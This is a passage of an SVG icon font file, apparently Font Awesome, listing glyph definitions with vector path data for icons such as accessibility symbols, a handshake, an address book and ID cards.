c0.974609 5.45898 6.2666 9.89062 11.8125 9.89062h79.0967l15.377 86.1094c0.974609 5.45898 6.2666 9.89062 11.8125 9.89062h40.6318c7.47266 0 13.127 -6.75391 11.8135 -14.1094l-14.623 -81.8906h98.6348l15.377 86.1094
c0.974609 5.45898 6.26758 9.89062 11.8135 9.89062h40.6318c7.4707 0 13.126 -6.75391 11.8125 -14.1094l-14.623 -81.8906h74.8105c7.4707 0 13.126 -6.75391 11.8125 -14.1094zM261.889 128l22.8574 128h-98.6338l-22.8574 -128h98.6338z" />
    <glyph glyph-name="percent" unicode="&#xf295;" horiz-adv-x="448" 
d="M112 224c-61.9004 0 -112 50.0996 -112 112s50.0996 112 112 112s112 -50.0996 112 -112s-50.0996 -112 -112 -112zM112 384c-26.5 0 -48 -21.5 -48 -48s21.5 -48 48 -48s48 21.5 48 48s-21.5 48 -48 48zM336 160c61.9004 0 112 -50.0996 112 -112
s-50.0996 -112 -112 -112s-112 50.0996 -112 112s50.0996 112 112 112zM336 0c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM392.3 447.8l31.6006 0.100586c19.3994 0.0996094 30.8994 -21.8008 19.6992 -37.8008l-366.199 -463.699
c-3.94629 -5.62793 -12.7275 -10.1973 -19.6006 -10.2002l-33.3994 -0.100586c-19.5 0 -30.9004 21.9004 -19.7002 37.8008l368 463.699c4.5 6.40039 11.7998 10.2002 19.5996 10.2002z" />
    <glyph glyph-name="universal-access" unicode="&#xf29a;" 
d="M256 400c-114.971 0 -208 -93.0469 -208 -208c0 -114.971 93.0469 -208 208 -208c114.971 0 208 93.0469 208 208c0 114.971 -93.0469 208 -208 208zM256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248z
M256 384c106.039 0 192 -85.9609 192 -192s-85.9609 -192 -192 -192s-192 85.9609 -192 192s85.9609 192 192 192zM256 340c-19.8818 0 -36 -16.1182 -36 -36s16.1182 -36 36 -36s36 16.1182 36 36s-16.1182 36 -36 36zM373.741 241.977
c8.59961 2.03027 13.9258 10.6484 11.8965 19.249c-2.03027 8.60156 -10.6494 13.9258 -19.249 11.8955c-96.4912 -22.7832 -124.089 -22.8291 -220.774 0c-8.60254 2.03125 -17.2178 -3.29395 -19.249 -11.8955c-2.03125 -8.60059 3.29492 -17.2178 11.8945 -19.249
c28.7129 -6.7793 55.5127 -12.749 82.1416 -15.8066c-0.852539 -101.08 -12.3242 -123.08 -25.0371 -155.621c-3.61719 -9.25879 0.957031 -19.6982 10.2168 -23.3145c9.26465 -3.61914 19.7002 0.961914 23.3154 10.2168c8.72754 22.3408 17.0947 40.6982 22.2617 78.5488
h9.68555c5.1748 -37.9131 13.5566 -56.2412 22.2617 -78.5488c3.61621 -9.25977 14.0547 -13.834 23.3154 -10.2168c9.25977 3.61621 13.834 14.0547 10.2168 23.3145c-12.7305 32.5693 -24.1855 54.5986 -25.0371 155.621c26.6299 3.05859 53.4287 9.02832 82.1406 15.8066
z" />
    <glyph glyph-name="blind" unicode="&#xf29d;" horiz-adv-x="383" 
d="M380.15 -62.8369c-1.05664 -0.640625 -2.91602 -1.16113 -4.15137 -1.16113c-2.48438 0 -5.54785 1.72363 -6.83789 3.84766l-125.33 206.428c4.25684 1.68848 10.0615 5.9375 12.958 9.48438l126.048 -207.607c0.641602 -1.05664 1.16211 -2.91699 1.16211 -4.15234
c0 -2.48535 -1.72461 -5.5498 -3.84863 -6.83887zM142.803 133.662l62.8145 -153.537c6.69141 -16.3584 -1.14453 -35.042 -17.501 -41.7344c-16.3564 -6.69043 -35.04 1.1416 -41.7334 17.501l-36.1201 88.2852zM96 360c-24.3008 0 -44 19.6992 -44 44s19.6992 44 44 44
s44 -19.6992 44 -44s-19.6992 -44 -44 -44zM250.837 190.872c8.19336 -10.374 6.44434 -25.4922 -3.96582 -33.708c-9.33984 -7.37402 -24.5635 -7.61914 -33.708 3.96484l-102.3 129.217c-0.663086 0.836914 -2.06738 1.51562 -3.13477 1.51562
c-2.20801 0 -4 -1.79297 -4 -4.00098c0 -0.769531 0.387695 -1.88281 0.865234 -2.48535l31.4062 -39.8164v-107.196l-65.9258 -181.288c-6.04102 -16.6143 -24.4072 -25.1768 -41.0088 -19.1387c-16.6104 6.04004 -25.1787 24.4004 -19.1387 41.0098l54.0732 148.693
v140.698l-16 -20.5713v-79.7656c0 -13.0996 -10.4951 -23.748 -23.5361 -23.9961c-13.4531 -0.254883 -24.4639 11.0811 -24.4639 24.5361v95.6943l61.0557 78.5c4.72754 6.0791 11.7979 9.23633 18.9443 9.23926v0.0263672h32v-0.015625
c7.08691 -0.00390625 14.1035 -3.11719 18.8369 -9.1123z" />
    <glyph glyph-name="audio-description" unicode="&#xf29e;" 
d="M162.925 209.291l8.82227 -30.6553h-25.6064l9.04102 30.6523c1.27734 4.4209 2.65137 9.99414 3.87207 15.2451c1.2207 -5.25098 2.59473 -10.8232 3.87109 -15.2422zM329.399 241.39c28.6846 0 46.1748 -16.7656 46.1748 -49.0049
c0 -32.0977 -16.3994 -49.7754 -46.1748 -49.7754h-14.5234v98.7803h14.5234zM512 336v-288c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h416c26.5098 0 48 -21.4902 48 -48zM245.459 111.861l-57.0967 168
c-1.52734 4.49219 -6.61719 8.13867 -11.3623 8.13867h-35.8936c-4.74512 0 -9.83594 -3.64648 -11.3623 -8.13867l-57.0967 -168c-2.64453 -7.7832 3.1416 -15.8613 11.3613 -15.8613h29.1328c4.99219 0 10.1602 3.89453 11.5352 8.69336l8.57422 29.9053h51.3672
l8.79297 -29.9766c1.39648 -4.75977 6.55469 -8.62207 11.5146 -8.62207v0h29.1719c8.2207 0 14.0059 8.07812 11.3613 15.8613zM430.16 192.386c0 58.9775 -37.9189 95.6143 -98.96 95.6143h-57.3662c-6.62695 0 -12 -5.37305 -12 -12v-168c0 -6.62695 5.37305 -12 12 -12
h57.3662c61.041 0 98.96 36.9326 98.96 96.3857z" />
    <glyph glyph-name="phone-volume" unicode="&#xf2a0;" horiz-adv-x="383" 
d="M97.333 -58.9658c-129.874 129.874 -129.681 340.252 0 469.933c5.69824 5.69824 14.5273 6.63184 21.2627 2.42188l64.8174 -40.5127c4.45898 -2.78711 8.07812 -9.31641 8.07812 -14.5752c0 -1.82715 -0.550781 -4.68652 -1.22949 -6.38281l-32.4082 -81.0205
c-2.38477 -5.96484 -9.53418 -10.8047 -15.958 -10.8047c-0.473633 0 -1.23926 0.0380859 -1.71094 0.0849609l-55.8096 5.58008c-21.0508 -58.2607 -20.6123 -122.471 0 -179.515l55.8105 5.58105c0.47168 0.046875 1.2373 0.0849609 1.71094 0.0849609
c6.42383 0 13.5732 -4.83984 15.959 -10.8037l32.4072 -81.0225c0.678711 -1.69629 1.22949 -4.55566 1.22949 -6.38281c0 -5.25879 -3.61914 -11.7881 -8.07812 -14.5752l-64.8174 -40.5127c-2.30762 -1.44238 -6.38867 -2.6123 -9.10938 -2.6123
c-3.92969 0 -9.375 2.25488 -12.1543 5.03418zM247.126 352.527c11.832 -20.0469 11.832 -45.0088 0 -65.0557c-3.9502 -6.69238 -13.1084 -7.95898 -18.7178 -2.58105l-5.97559 5.72656c-3.91016 3.74805 -4.79297 9.62207 -2.26074 14.4102
c2.04883 3.87793 3.71094 10.5859 3.71094 14.9717c0 4.38672 -1.66211 11.0947 -3.71094 14.9727c-2.5332 4.78809 -1.64941 10.6621 2.26074 14.4102l5.97559 5.72656c5.60938 5.37793 14.7676 4.11133 18.7178 -2.58105zM338.913 443.714
c60.1396 -71.6035 60.0918 -175.882 0 -247.428c-4.47363 -5.32715 -12.5303 -5.74609 -17.5518 -0.933594l-5.79785 5.55762c-4.56055 4.37109 -4.97754 11.5293 -0.930664 16.3789c49.6875 59.5381 49.6465 145.933 0 205.422
c-4.04688 4.84961 -3.63086 12.0078 0.930664 16.3789l5.79785 5.55762c5.02148 4.8125 13.0781 4.39355 17.5518 -0.933594zM292.941 398.773c36.0498 -46.3223 36.1074 -111.149 0 -157.547c-4.39062 -5.64062 -12.6973 -6.25098 -17.8564 -1.30371l-5.81836 5.5791
c-4.39941 4.21875 -4.99805 11.0947 -1.28418 15.9307c26.5352 34.5645 26.5332 82.5723 0 117.135c-3.71387 4.83594 -3.11523 11.7109 1.28418 15.9307l5.81836 5.5791c5.15918 4.94727 13.4658 4.33691 17.8564 -1.30371z" />
    <glyph glyph-name="braille" unicode="&#xf2a1;" horiz-adv-x="640" 
d="M128 192c0 -35.3457 -28.6543 -64 -64 -64s-64 28.6543 -64 64s28.6543 64 64 64s64 -28.6543 64 -64zM64 64c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM64 416c35.3457 0 64 -28.6543 64 -64s-28.6543 -64 -64 -64
s-64 28.6543 -64 64s28.6543 64 64 64zM224 224c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM224 64c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM224 416
c35.3457 0 64 -28.6543 64 -64s-28.6543 -64 -64 -64s-64 28.6543 -64 64s28.6543 64 64 64zM448 224c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM448 64c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32
s-32 14.3271 -32 32s14.3271 32 32 32zM448 416c35.3457 0 64 -28.6543 64 -64s-28.6543 -64 -64 -64s-64 28.6543 -64 64s28.6543 64 64 64zM608 224c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM608 64
c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM608 384c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32z" />
    <glyph glyph-name="assistive-listening-systems" unicode="&#xf2a2;" 
d="M216 188c0 -15.4639 -12.5361 -28 -28 -28s-28 12.5361 -28 28c0 44.1123 35.8877 80 80 80s80 -35.8877 80 -80c0 -15.4639 -12.5361 -28 -28 -28s-28 12.5361 -28 28c0 13.2344 -10.7666 24 -24 24s-24 -10.7656 -24 -24zM240 364c97.0469 0 176 -78.9531 176 -176
c0 -95.9863 -71.4053 -109.798 -72 -144.226c-0.124023 -59.4463 -48.5254 -107.774 -108 -107.774c-15.4639 0 -28 12.5361 -28 28s12.5361 28 28 28c28.6729 0 52 23.3271 52 52l0.00292969 0.37793c0.988281 73.3115 71.9971 68.458 71.9971 143.622
c0 66.168 -53.832 120 -120 120s-120 -53.832 -120 -120c0 -15.4639 -12.5361 -28 -28 -28s-28 12.5361 -28 28c0 97.0469 78.9531 176 176 176zM160 128c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM32 0
c17.6729 0 32 -14.3271 32 -32s-14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32zM512 187.993c0 -15.4639 -12.5371 -28 -28.001 -28s-28 12.5361 -28 28c0 1.12695 -0.00683594 2.24512 -0.0332031 3.36328l-0.00292969 0.1875
c-1.4668 91.4404 -60.1709 172.599 -146.077 201.953c-14.6318 5.00098 -22.4414 20.917 -17.4414 35.5498c5.00098 14.6328 20.917 22.4404 35.5498 17.4424c108.163 -36.959 182.082 -139.015 183.961 -253.965c0.0332031 -1.50684 0.0449219 -3.01367 0.0449219 -4.53125
zM152.971 8.9707l-33.9404 -33.9404l-80 80l33.9404 33.9404z" />
    <glyph glyph-name="american-sign-language-interpreting" unicode="&#xf2a3;" horiz-adv-x="639" 
d="M290.547 258.961c-20.2949 10.1494 -44.1465 11.1992 -64.7393 3.88965c42.6064 0 71.208 -20.4746 85.5781 -50.5752c8.57617 -17.8994 -5.14746 -38.0713 -23.6172 -38.0713c18.4297 0 32.2119 -20.1357 23.6172 -38.0713
c-14.7246 -30.8457 -46.123 -50.8535 -80.2979 -50.8535c-0.556641 0 -94.4707 8.61426 -94.4707 8.61426l-66.4062 -33.3467c-9.38379 -4.69336 -19.8145 -0.378906 -23.8945 7.78125l-44.4561 88.9248c-4.16699 8.61523 -1.11133 18.8975 6.94531 23.6211l58.0723 33.0693
l41.1221 74.1953c6.38965 57.2451 34.7314 109.768 79.7432 146.727c11.3906 9.44824 28.3408 7.78125 37.5098 -3.61328c9.44629 -11.3936 7.78027 -28.0674 -3.6123 -37.5156c-12.5029 -10.5596 -23.6172 -22.5098 -32.5088 -35.5703
c21.6719 14.7285 46.6787 24.7324 74.1865 28.0674c14.7246 1.94434 28.0625 -8.33594 29.7295 -23.0654c1.94531 -14.7275 -8.33594 -28.0674 -23.0615 -29.7344c-16.1162 -1.94434 -31.1201 -7.50293 -44.1787 -15.2832c26.1143 5.71289 58.7119 3.1377 88.0791 -11.1152
c13.3359 -6.66895 18.8936 -22.5088 12.2246 -35.8486c-6.38965 -13.0596 -22.5039 -18.6162 -35.5645 -12.2256zM263.318 189.489c-6.1123 12.5049 -18.3379 20.2861 -32.2314 20.2861h-0.105469c-19.5732 0 -35.46 -15.8867 -35.46 -35.46
c0 -0.0302734 0 -0.0800781 0.000976562 -0.110352c0 -21.4277 17.8076 -35.5703 35.5645 -35.5703c13.8936 0 26.1191 7.78125 32.2314 20.2861c4.44531 9.44922 13.6133 15.0059 23.3389 15.2842c-9.72559 0.277344 -18.8936 5.83496 -23.3389 15.2842zM638.139 226.726
c4.16797 -8.61426 1.11133 -18.8965 -6.94531 -23.6201l-58.0713 -33.0693l-41.1221 -74.1963c-6.38965 -57.2451 -34.7314 -109.767 -79.7432 -146.726c-10.9316 -9.1123 -27.7988 -8.14453 -37.5098 3.6123c-9.44629 11.3945 -7.78027 28.0674 3.61328 37.5166
c12.5029 10.5586 23.6162 22.5088 32.5078 35.5703c-21.6719 -14.7295 -46.6787 -24.7324 -74.1865 -28.0674c-10.0205 -2.50586 -27.5518 5.64258 -29.7295 23.0645c-1.94531 14.7285 8.33594 28.0674 23.0615 29.7344c16.1162 1.94629 31.1201 7.50293 44.1787 15.2842
c-26.1143 -5.71289 -58.7119 -3.1377 -88.0791 11.1152c-13.3359 6.66895 -18.8936 22.5088 -12.2246 35.8477c6.38965 13.0605 22.5049 18.6191 35.5654 12.2266c20.2949 -10.1484 44.1465 -11.1982 64.7393 -3.88965c-42.6064 0 -71.208 20.4746 -85.5781 50.5762
c-8.57617 17.8984 5.14746 38.0713 23.6172 38.0713c-18.4297 0 -32.2109 20.1357 -23.6172 38.0703c14.0332 29.3965 44.0391 50.8877 81.9658 50.8545l92.8027 -8.61523l66.4062 33.3467c9.4082 4.7041 19.8281 0.354492 23.8936 -7.78027zM408.912 245.344
c-13.8936 0 -26.1191 -7.78027 -32.2314 -20.2861c-4.44531 -9.44824 -13.6133 -15.0059 -23.3389 -15.2832c9.72559 -0.27832 18.8936 -5.83594 23.3389 -15.2842c6.1123 -12.5049 18.3379 -20.2861 32.2314 -20.2861h0.105469c19.5732 0 35.46 15.8857 35.46 35.46
c0 0.0302734 0 0.0791016 -0.000976562 0.110352c0 21.4287 -17.8076 35.5693 -35.5645 35.5693z" />
    <glyph glyph-name="deaf" unicode="&#xf2a4;" 
d="M216 188c0 -15.4639 -12.5361 -28 -28 -28s-28 12.5361 -28 28c0 44.1123 35.8877 80 80 80s80 -35.8877 80 -80c0 -15.4639 -12.5361 -28 -28 -28s-28 12.5361 -28 28c0 13.2344 -10.7666 24 -24 24s-24 -10.7656 -24 -24zM240 364c97.0469 0 176 -78.9531 176 -176
c0 -95.9863 -71.4053 -109.798 -72 -144.226c-0.124023 -59.4463 -48.5254 -107.774 -108 -107.774c-15.4639 0 -28 12.5361 -28 28s12.5361 28 28 28c28.6729 0 52 23.3271 52 52l0.00292969 0.37793c0.988281 73.3115 71.9971 68.458 71.9971 143.622
c0 66.168 -53.832 120 -120 120s-120 -53.832 -120 -120c0 -15.4639 -12.5361 -28 -28 -28s-28 12.5361 -28 28c0 97.0469 78.9531 176 176 176zM508.485 416.201c4.68652 -4.68652 4.68652 -12.2842 0 -16.9727l-87.0303 -87.0283
c-4.68652 -4.68652 -12.2842 -4.68652 -16.9697 0l-28.2852 28.2852c-4.68652 4.68652 -4.68652 12.2842 0 16.9707l87.0283 87.0293c4.6875 4.68555 12.2842 4.68555 16.9717 0zM168.97 133.255l28.2861 -28.2842c4.68652 -4.68652 4.68652 -12.2852 0 -16.9707
l-148.484 -148.485c-4.6875 -4.68555 -12.2842 -4.68555 -16.9717 0l-28.2852 28.2842c-4.68555 4.6875 -4.68555 12.2852 0 16.9707l148.485 148.485c4.68555 4.68652 12.2842 4.68652 16.9697 0z" />
    <glyph glyph-name="sign-language" unicode="&#xf2a7;" horiz-adv-x="447" 
d="M91.4336 -35.9873c-0.306641 16.0186 13.1094 29.1289 29.1309 29.1289h62.293v5.71484h-125.864c-16.0215 0 -29.4375 13.1104 -29.1299 29.1289c0.296875 15.5234 12.9717 28.0146 28.5645 28.0146h126.43v5.71387h-153.722
c-16.0205 0 -29.4365 13.1113 -29.1299 29.1289c0.296875 15.5225 12.9727 28.0137 28.5664 28.0137h154.286v5.71387h-125.151c-16.0215 0 -29.4375 13.1104 -29.1299 29.1289c0.296875 15.5215 12.9727 28.0127 28.5654 28.0127h168.566l-31.085 22.6064
c-12.7617 9.28027 -15.583 27.1484 -6.30176 39.9121c9.28027 12.7607 27.1494 15.5811 39.9121 6.30176l123.36 -89.7148c7.79395 -5.66895 14.1201 -18.0908 14.1201 -27.7285v-141.136c0 -15.9102 -10.9463 -29.7305 -26.4326 -33.374l-80.4717 -18.9346
c-8.55176 -2.01172 -22.624 -3.64551 -31.4102 -3.64551h-107.4c-15.5928 0.000976562 -28.2686 12.4922 -28.5664 28.0137zM164.683 189.714l-36.3711 46.71c-9.5791 12.3027 -7.51172 29.9795 4.55371 39.75c12.4502 10.083 31.0371 7.55273 40.8799 -5.08789
l13.0039 -16.7002c-17.1426 -15.6484 -15.4092 -43.0244 3.16992 -56.5361l11.1875 -8.13574h-36.4238zM447.981 191.817c0.00976562 -0.311523 0.0175781 -0.81543 0.0175781 -1.12695c0 -9.24902 -5.92188 -21.3682 -13.2197 -27.0508l-61.0645 -47.5488v16.999
c0 13.4834 -6.51074 26.2686 -17.415 34.1982l-123.359 89.7139c-12.6357 9.18945 -29.1934 9.16113 -41.6904 0.904297l-52.0527 66.8486c-9.84375 12.6416 -7.74121 31.2822 5.08594 40.8809c12.4297 9.30273 30.0732 6.97559 39.6523 -5.32812l77.6758 -99.7539
l4.50879 3.51172l-94.4434 121.287c-9.84277 12.6416 -7.74121 31.2822 5.08594 40.8818c12.4307 9.30176 30.0732 6.97461 39.6533 -5.32812l94.79 -121.734l4.50879 3.51074l-76.8887 98.7451c-9.84277 12.6416 -7.74121 31.2822 5.08594 40.8809
c12.4297 9.30273 30.0732 6.97559 39.6533 -5.32715l103.562 -133.001l-1.26172 38.4141c-0.518555 15.7715 11.8457 28.9756 27.6191 29.4932c15.7705 0.517578 28.9746 -11.8477 29.4922 -27.6191z" />
    <glyph glyph-name="low-vision" unicode="&#xf2a8;" horiz-adv-x="576" 
d="M569.344 216.369c3.67383 -6.22461 6.65625 -17.1416 6.65625 -24.3691s-2.98242 -18.1455 -6.65723 -24.3701c-31.9746 -54.2607 -79.6484 -98.3232 -136.81 -126.301l0.00683594 -0.00878906l43.1201 -58.377c7.60156 -10.8594 4.95996 -25.8252 -5.90039 -33.4268
l-13.1133 -9.17773c-10.8594 -7.59863 -25.8223 -4.95801 -33.4238 5.90039l-251.836 356.544c-11.1797 -5.09375 -28.5518 -14.7539 -38.7764 -21.5635l189.979 -271.399c-9.52637 -1.00488 -25.0342 -1.82031 -34.6133 -1.82031
c-12.29 0 -32.1484 1.33984 -44.3262 2.99023l-40.6309 58.04h-0.00976562l-119.399 170.58c-8.64453 -9.25391 -21.3203 -25.3428 -28.2939 -35.9121l124.19 -177.417c-73.1172 25.4863 -134.358 76.0166 -172.858 141.349c-8.96484 15.2109 -8.76562 33.8643 0 48.7393
c0.0107422 0.0166016 0.0234375 0.0332031 0.0332031 0.0498047c33.5459 56.8984 82.7676 99.8506 136.79 126.242l-43.1309 58.3945c-7.60156 10.8604 -4.95996 25.8252 5.90039 33.4268l13.1143 9.17773c10.8584 7.59961 25.8213 4.95801 33.4229 -5.90039
l52.7705 -72.1689c26.3496 6.79004 53.9834 10.4092 82.4512 10.4092c119.81 0 224.96 -63.9492 281.344 -159.631zM390.026 102.06c21.1406 23.9658 33.9736 55.4365 33.9736 89.9404c0 75.1738 -60.8379 136 -136 136c-17.5117 0 -34.2422 -3.30566 -49.6084 -9.32324
l19.0684 -27.2363c25.9883 7.96289 54.7598 5.56836 79.5098 -7.68066h-0.0292969c-23.6504 0 -42.8203 -19.1699 -42.8203 -42.8193c0 -23.4717 18.9922 -42.8203 42.8203 -42.8203c23.6494 0 42.8193 19.1699 42.8193 42.8203v0.0292969
c18.9111 -35.3271 15.8818 -79.1123 -8.7998 -111.68z" />
    <glyph glyph-name="handshake" unicode="&#xf2b5;" horiz-adv-x="640" 
d="M434.7 384c8.5 0 16.7002 -3.40039 22.5996 -9.40039l54.6006 -54.5996v-193.5c-2.40039 2.7002 -5 5.2998 -7.90039 7.7002l-145.6 118.2l26.0996 23.8994c6.5 6 7 16.1006 1 22.6006c-5.90039 6.5 -16.0996 6.89941 -22.5996 1l-79.9004 -73.2002
c-0.0996094 -0.100586 -0.299805 -0.100586 -0.400391 -0.200195c-16.6992 -14.9004 -43.3994 -11.2002 -56.0996 2.7002c-14.2002 15.5 -14.5 40.3994 2.09961 56c0.100586 0.0996094 0.200195 0.299805 0.300781 0.399414l98.2998 90
c5.89941 5.40039 13.5996 8.40039 21.5996 8.40039h85.9004zM544 319.8h96v-255.899h-64c-17.7002 0 -32 14.2998 -32 32v223.899zM592 95.9004c8.7998 0 16 7.19922 16 16c0 8.7998 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.80078 7.2002 -16 16 -16zM0 64v255.8h96
v-223.8c0 -17.7002 -14.2998 -32 -32 -32h-64zM48 127.9c-8.7998 0 -16 -7.10059 -16 -16c0 -8.80078 7.2002 -16 16 -16s16 7.19922 16 16c0 8.7998 -7.2002 16 -16 16zM483.9 109.3c13.6992 -11.2002 15.7998 -31.2998 4.59961 -45.0996l-9.5 -11.7002
c-11.0996 -13.7998 -31.2998 -15.7998 -45 -4.7002l-5.40039 4.40039l-31.3994 -38.6006c-12.9004 -15.8994 -36.4004 -18.3994 -52.2998 -5.39941l-17.9004 15.5l-0.200195 -0.200195c-22.2998 -27.4004 -62.5996 -31.5996 -90 -9.2998l-90.5 81.8994h-18.2998v223.9
l54.7002 54.5996c6 6 14.0996 9.40039 22.5996 9.40039h83.7998l-81.7998 -74.9004c-29.2002 -26.7998 -31.2998 -72.2998 -4.39941 -101.699c26.5 -28.9004 72 -31.5 101.699 -4.40039l30 27.5z" />
    <glyph glyph-name="envelope-open" unicode="&#xf2b6;" 
d="M512 -16c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v263.276c0 12.8955 8.2373 29.8193 18.3867 37.7754c24.9131 19.5293 45.501 35.3652 164.2 121.512c16.8252 12.2666 50.21 41.7832 73.4131 41.4336
c23.1982 0.353516 56.5957 -29.1719 73.4131 -41.4326c118.687 -86.1377 139.303 -101.995 164.2 -121.513c10.1494 -7.95605 18.3867 -24.8799 18.3867 -37.7754v-263.276zM446.334 180.605c-2.5625 3.72754 -7.7002 4.59473 -11.3389 1.90625
c-22.8447 -16.873 -55.4619 -40.7051 -105.582 -77.0791c-16.8252 -12.2656 -50.21 -41.7803 -73.4131 -41.4297c-23.2109 -0.34375 -56.5586 29.1436 -73.4131 41.4297c-50.1143 36.3701 -82.7344 60.2041 -105.582 77.0791
c-3.63867 2.68848 -8.77637 1.82129 -11.3389 -1.90625l-9.07227 -13.1963c-0.777344 -1.13086 -1.4082 -3.16113 -1.4082 -4.5332c0 -2.22754 1.45508 -5.11035 3.24707 -6.43359c22.8877 -16.8994 55.4541 -40.6904 105.304 -76.8682
c20.2734 -14.7812 56.5234 -47.8135 92.2637 -47.5732c35.7236 -0.242188 71.9609 32.7715 92.2627 47.5732c49.8506 36.1787 82.418 59.9697 105.304 76.8682c1.79199 1.32324 3.24707 4.20605 3.24707 6.43359c0 1.37207 -0.630859 3.40234 -1.4082 4.5332z" />
    <glyph glyph-name="address-book" unicode="&#xf2b9;" horiz-adv-x="448" 
d="M436 288h-20v-64h20c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-20v-64h20c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-20v-48c0 -26.5 -21.5 -48 -48 -48h-320c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48
h320c26.5 0 48 -21.5 48 -48v-48h20c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12zM208 320c-35.2998 0 -64 -28.7002 -64 -64s28.7002 -64 64 -64s64 28.7002 64 64s-28.7002 64 -64 64zM320 83.2002v19.2002
c0 31.7998 -30.0996 57.5996 -67.2002 57.5996h-5c-12.2002 -5.09961 -25.7002 -8 -39.7998 -8s-27.5 2.90039 -39.7998 8h-5c-37.1006 0 -67.2002 -25.7998 -67.2002 -57.5996v-19.2002c0 -10.6006 10 -19.2002 22.4004 -19.2002h179.199
c12.4004 0 22.4004 8.59961 22.4004 19.2002z" />
    <glyph glyph-name="address-card" unicode="&#xf2bb;" horiz-adv-x="576" 
d="M528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480zM176 320c-35.2998 0 -64 -28.7002 -64 -64s28.7002 -64 64 -64s64 28.7002 64 64s-28.7002 64 -64 64zM288 83.2002v19.2002
c0 31.7998 -30.0996 57.5996 -67.2002 57.5996h-5c-12.2002 -5.09961 -25.7002 -8 -39.7998 -8s-27.5 2.90039 -39.7998 8h-5c-37.1006 0 -67.2002 -25.7998 -67.2002 -57.5996v-19.2002c0 -10.6006 10 -19.2002 22.4004 -19.2002h179.199
c12.4004 0 22.4004 8.59961 22.4004 19.2002zM512 136v16c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8zM512 200v16c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8v-16
c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8zM512 264v16c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="user-circle" unicode="&#xf2bd;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 344c-48.5996 0 -88 -39.4004 -88 -88s39.4004 -88 88 -88s88 39.4004 88 88s-39.4004 88 -88 88zM248 0c58.7002 0 111.3 26.5996 146.5 68.2002
c-18.7998 35.3994 -55.5996 59.7998 -98.5 59.7998c-2.40039 0 -4.7998 -0.400391 -7.09961 -1.09961c-12.9004 -4.2002 -26.6006 -6.90039 -40.9004 -6.90039s-27.9004 2.7002 -40.9004 6.90039c-2.2998 0.699219 -4.69922 1.09961 -7.09961 1.09961
c-42.9004 0 -79.7002 -24.4004 -98.5 -59.7998c35.2002 -41.6006 87.7998 -68.2002 146.5 -68.2002z" />
    <glyph glyph-name="id-badge" unicode="&#xf2c1;" horiz-adv-x="384" 
d="M336 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h288zM144 416c-8.7998 0 -16 -7.2002 -16 -16s7.2002 -16 16 -16h96c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16h-96zM192 288
c-35.2998 0 -64 -28.7002 -64 -64s28.7002 -64 64 -64s64 28.7002 64 64s-28.7002 64 -64 64zM304 51.2002v19.2002c0 31.7998 -30.0996 57.5996 -67.2002 57.5996h-5c-12.2002 -5.09961 -25.7002 -8 -39.7998 -8s-27.5 2.90039 -39.7998 8h-5
c-37.1006 0 -67.2002 -25.7998 -67.2002 -57.5996v-19.2002c0 -10.6006 10 -19.2002 22.4004 -19.2002h179.199c12.4004 0 22.4004 8.59961 22.4004 19.2002z" />
    <glyph glyph-name="id-card" unicode="&#xf2c2;" horiz-adv-x="576" 
d="M528 416c26.5 0 48 -21.5 48 -48v-16h-576v16c0 26.5 21.5 48 48 48h480zM0 16v304h576v-304c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48zM352 248v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-144
